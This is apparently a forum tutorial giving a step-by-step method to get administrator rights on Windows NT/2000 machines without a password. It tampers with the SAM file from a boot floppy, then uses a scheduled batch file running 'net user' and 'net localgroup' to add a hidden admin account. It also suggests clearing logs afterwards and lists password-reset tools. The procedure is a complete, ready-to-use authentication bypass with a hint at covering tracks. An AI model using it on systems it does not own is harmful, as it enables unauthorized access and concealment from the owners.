This is my first howto/tutorial, so if there are any suggestions of any kind or questions, please let me know.


How to create an Administrative Account without being an Administrator
Next time you're faced with an NT or 2k system that you need to logon to
with an administrative account and nobody knows the passwords, do the
following 12 steps to create a new account while preserving the existing
account profiles.

1) boot to a windows boot disk

2) if the C drive is NTFS use ntfsdos to mount it

3) maneuver to c:\winnt\system32\config

4) rename the SAM. file to anything you want

5) reboot and login as 'administrator' and a blank password

At this point you have administrative access, but any changes you make to
the profiles will not be saved to the proper SAM file and will be lost.
All other changes (configurations, installations, etc) made at this point
will be saved.


6) open notepad

7) type '@echo off
net user newuser mypass /ADD
net localgroup /ADD administrators newuser'

save as c:\useradd.bat

9) open a command prompt and type
at <enter a time 10 minutes or so into the future> "c:\useradd.bat"

10) reboot to your floppy

11) delete the c:\winnt\system32\config\SAM. file and rename the old one
back to SAM.

12) reboot and wait 10-15 minutes for the batch file to execute. The batch file will execute with system privledges and create the 'newuser' account and add it to the administrators group.

You can then logon with your newuser account with local administrative rights and can reset the original administrator account, clear the logs or do whatever it is you need to.

Unfortunately, the only way to defend against something like this in the wild is to ensure you have proper auditing and hope whomever it is doesn't run through your security log and edit out the appropriate entries.


There are now several new tools out there to assist you in recovering/changing passwords:

http://www.loginrecovery.com/


Login Recovery is a service to reveal user names and recover passwords for Windows NT, 2000, XP, 2003 and Vista. As long as you have physical access to the computer, your passwords can be recovered



http://ebcd.pcministry.com/


change password of any user, including administator of Windows NT/2000/XP OS. You do not need to know the old password.


http://trinityhome.org/Home/index.ph...=1&front_id=12

Here 's a sumup of some of the most important features, new and old:
-easily reset windows passwords
-4 different virusscan products integrated in a single uniform commandline with online update capability
-full ntfs write support thanks to ntfs-3g (all other drivers included as well)
-clone NTFS filesystems over the network
-wide range of hardware support (kernel 2.6.19.1 and recent kudzu hwdata)
-easy script to find all local filesystems


http://www.ubcd4win.com/contents.htm


(re)set the passwords of any user that has a valid local account, create a new local user with administrator rights, and set administrator rights to existing user on your NT system